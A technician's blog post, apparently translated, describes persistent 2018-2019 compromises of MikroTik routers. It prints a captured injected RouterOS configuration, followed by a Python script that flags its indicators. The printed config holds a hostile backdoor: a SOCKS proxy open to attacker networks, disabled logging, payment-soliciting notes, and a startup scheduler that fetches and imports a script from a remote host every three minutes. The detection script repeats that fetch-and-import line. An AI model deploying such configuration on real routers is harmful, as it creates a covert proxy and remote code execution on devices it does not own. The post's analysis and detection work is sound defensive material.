
Mikrotik : The 2018-2019 Outbreak That Still Persists

email : ariyaandro@gmail.com

Mikrotik : Hajime Botnet Attack on Mikrotik Routers Worldwide

Mikrotik : September 2018 Outbreak

Mikrotik : October 2018 Outbreak

Mikrotik : November 2018 Outbreak

Mikrotik : January 2019 Outbreak

Judging from the posts listed above, it seems that older, vulnerable Mikrotik versions are still in use a year on. This month's attack resembles the previous ones: a staged attack that inserts firewall rules, leaves a bitcoin note, creates NAT rules, enables the proxy, changes the Mikrotik service ports, and so on.

Here is a capture of the attack that occurred.

Here is the snippet of configuration that was injected... fortunately the main login had not yet been locked out...

#apr/26/2019 10:29:32 by RouterOS 6.39.2

/system logging action
set 1 disk-file-name=log

/ip firewall address-list
add address=10.0.0.0/8 list=allow-ip
add address=100.64.0.0/10 list=allow-ip
add address=172.16.0.0/12 list=allow-ip
add address=192.168.0.0/16 list=allow-ip
add address=127.0.0.1 list=allow-ip

/ip firewall filter
add action=add-src-to-address-list address-list=ip1 address-list-timeout=7s \
chain=input comment="I closed the vulnerability with a firewall." \
packet-size=1244 protocol=icmp
add action=accept chain=input dst-port=1993 protocol=tcp
add action=reject chain=output dst-address=139.99.5.202 protocol=tcp
add action=reject chain=output dst-address=95.154.216.166 protocol=tcp
add action=accept chain=input dst-port=1993 protocol=tcp
add action=accept chain=input dst-port=1993 protocol=tcp
add action=accept chain=input dst-port=1993 protocol=tcp
add action=add-src-to-address-list address-list=ip2 address-list-timeout=7s \
chain=input comment=ip2 packet-size=447 protocol=icmp src-address-list=\
ip1
add action=add-src-to-address-list address-list=allow-ip \
address-list-timeout=1h chain=input comment=allow-ip packet-size=447 \
protocol=icmp src-address-list=ip2
add action=add-src-to-address-list address-list=blacklist \
address-list-timeout=2h chain=input comment=blacklist packet-size=!447 \
protocol=icmp src-address-list=ip2
add action=add-src-to-address-list address-list=blacklist \
address-list-timeout=2h chain=input comment=blacklist packet-size=397 \
protocol=icmp
add action=add-src-to-address-list address-list=blacklist \
address-list-timeout=2h chain=input comment=blacklist packet-size=1083 \
protocol=icmp
add action=drop chain=input comment=\
"You can say thanks on the WebMoney Z399578297824" dst-port=\
8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=blacklist
add action=add-src-to-address-list address-list=Ok address-list-timeout=10s \
chain=input comment=sysadminpxy dst-port=8080 protocol=tcp
add action=accept chain=input comment=sysadmin53u port=53 protocol=udp
add action=accept chain=input comment=sysadmin53t port=53 protocol=tcp
add action=accept chain=input comment=\
"Please update RotherOS and change password." src-address-list=allow-ip
add action=drop chain=input comment="or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1\
. My Telegram http://t.me/router_os" dst-port=\
8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=!allow-ip
add action=accept chain=input comment=\
"Please update RouterOS and change password." src-address-list=allow-ip
add action=passthrough chain=input
add action=tarpit chain=input comment=\
"Add you ip addess to allow-ip in Address Lists." dst-port=30553 \
protocol=tcp
add action=add-src-to-address-list address-list=Ok address-list-timeout=10s \
chain=input dst-port=8080 protocol=tcp

/ip firewall nat
add action=redirect chain=dstnat disabled=yes dst-port=80 protocol=tcp \
src-address-list=!Ok to-ports=8080
add action=redirect chain=dstnat comment=sysadminpxy disabled=yes dst-port=80 \
protocol=tcp src-address-list=!Ok to-ports=8080
add action=masquerade chain=srcnat
add action=dst-nat chain=dstnat dst-address=36.79.39.214 dst-port=554 \
protocol=tcp to-addresses=192.168.1.252 to-ports=554
add action=dst-nat chain=dstnat dst-address=36.79.39.214 dst-port=81 \
protocol=tcp to-addresses=192.168.1.252 to-ports=81
add action=dst-nat chain=dstnat dst-address=36.79.39.214 dst-port=8000 \
protocol=tcp to-addresses=192.168.1.252 to-ports=8000

/ip proxy
set cache-path=web-proxy1 enabled=yes

/ip proxy access
add action=deny comment=sysadminpxy

/ip service
set telnet disabled=yes
set ftp disabled=yes
set ssh port=22515
set api disabled=yes
set winbox disabled=yes
set api-ssl disabled=yes

/ip socks
set enabled=yes port=1993

/ip socks access
add src-address=94.130.51.0/24
add src-address=192.243.53.0/24
add src-address=82.204.203.0/24
add src-address=89.175.178.0/24
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0

/system logging
set 0 disabled=yes
set 1 disabled=yes
set 2 disabled=yes
set 3 disabled=yes

/system note
set note="The security flaw for Hajime is closed by the firewall. Please updat\
e RouterOS. Gratitude is accepted on WebMoney Z399578297824 or BTC 14qiYkk\
3nUgsdqQawiMLC1bUGDZWHowix1"

/system ntp client
set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235

/system scheduler
add interval=3m name=U6 on-event="/tool fetch url=http://gamesone.xyz/poll/8bc\
633a0-28b0-4587-9936-18b08a19adda mode=http dst-path=7wmp0b4swouv\r\
\n/import 7wmp0b4swouv" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup
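As an added example (not part of the original post), a short Python audit that parses a RouterOS export, joining the backslash-continued lines the way the export above wraps them, and flags the staged changes this post describes: SOCKS enabled, logging switched off, SSH moved off port 22, a startup scheduler that fetches and imports a remote script, and firewall comments soliciting payment. The embedded sample is constructed after the export above, with the attacker's BTC address and download URL replaced by placeholders.

```python
import re

# Constructed sample modelled on the export shown above; the attacker's BTC
# address and download URL are replaced by placeholders.
SAMPLE = r"""# apr/26/2019 10:29:32 by RouterOS 6.39.2
/ip firewall filter
add action=drop chain=input comment="or BTC BTC_ADDRESS_PLACEHOLDER" dst-port=\
    8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=!allow-ip
/ip service
set ssh port=22515
/ip socks
set enabled=yes port=1993
/system logging
set 0 disabled=yes
/system scheduler
add interval=3m name=U6 on-event="/tool fetch url=http://example.invalid/poll/X \
    mode=http dst-path=7wmp0b4swouv\r\
    \n/import 7wmp0b4swouv" policy=ftp,reboot,read,write,policy,test,password,\
    sniff,sensitive start-time=startup
"""

def parse_export(text):
    """Yield (section, command) pairs; a trailing backslash continues a line."""
    section, buf = None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):      # RouterOS wraps long commands this way
            buf += line[:-1]
            continue
        line, buf = buf + line, ""
        if line.startswith("/"):
            section = line           # e.g. "/ip socks"
        elif line and not line.startswith("#"):
            yield section, line

# (description, section, regex): the staged changes described in the post
CHECKS = [
    ("SOCKS proxy enabled", "/ip socks", r"\benabled=yes\b"),
    ("logging disabled", "/system logging", r"\bdisabled=yes\b"),
    ("ssh moved off port 22", "/ip service", r"^set ssh .*port=(?!22\b)\d+"),
    ("scheduler fetches and imports a remote script at startup",
     "/system scheduler", r"/tool fetch .*\\n/import .*start-time=startup"),
    ("firewall rule comment solicits payment", "/ip firewall filter",
     r"\b(BTC|WebMoney)\b"),
]

def audit(text):
    """Return the sorted list of indicator descriptions found in an export."""
    return sorted({desc for section, cmd in parse_export(text)
                   for desc, sec, pat in CHECKS
                   if section == sec and re.search(pat, cmd)})
```

Run `audit(open("export.rsc").read())` against a `/export` taken from a router to list which of these indicators are present; an empty list means none of the checks matched.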

Regards, fellow technicians
__________________________________
Author's technical profile link

email : ariyaandro@gmail.com
